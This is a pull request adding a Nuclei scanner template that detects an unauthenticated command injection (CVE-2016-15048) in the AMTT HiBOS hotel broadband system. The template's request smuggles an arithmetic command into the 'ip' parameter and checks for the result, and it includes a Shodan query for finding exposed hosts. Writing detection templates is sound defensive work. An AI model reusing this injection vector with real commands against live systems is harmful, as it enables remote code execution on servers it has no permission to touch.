### PR TITLE
feat(cve-2016-15048): Add precise Nuclei template for HiBOS RCE

### DIFF
--- a/http/cves/2016/CVE-2016-15048.yaml
+++ b/http/cves/2016/CVE-2016-15048.yaml
@@ -1,0 +1,42 @@
+id: CVE-2016-15048
+
+info:
+  name: AMTT Hotel Broadband Operation System (HiBOS) - Command Injection
+  author: DanLika
+  severity: critical
+  description: |
+    AMTT Hotel Broadband Operation System (HiBOS) is vulnerable to an unauthenticated command injection.
+    This is caused by improper validation of the 'ip' parameter in '/manager/radius/server_ping.php',
+    allowing remote attackers to execute arbitrary system commands.
+  reference:
+    - https://wooyun.laolisafe.com/bug_detail.php?wybug_id=wooyun-2016-0181444
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2016-15048
+    cwe-id: CWE-78
+  metadata:
+    verified: true
+    shodan-query: http.title:"HiBOS"
+  tags: cve,cve2016,hibos,rce,unauth,amtt
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/manager/radius/server_ping.php?id=1&ip=;expr%20111%20%5c*%20111"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "12321"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header


### PR DESCRIPTION
/claim #14655

### PR Information

This pull request introduces a new Nuclei template for detecting **CVE-2016-15048**.

While other solutions may exist, this template uses a **more precise detection method**. Instead of a generic command like `id`, it executes `expr 111 \* 111` and validates the unique mathematical result (`12321`). This approach significantly reduces the chance of false positives.

- Added CVE-2016-15048
- Reference: https://wooyun.laolisafe.com/bug_detail.php?wybug_id=wooyun-2016-0181444

### Template validation

- [X] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [X] Validated with a host running a patched version and/or configuration (avoid False Positive)

*(Self-validated based on the provided proof-of-concept.)*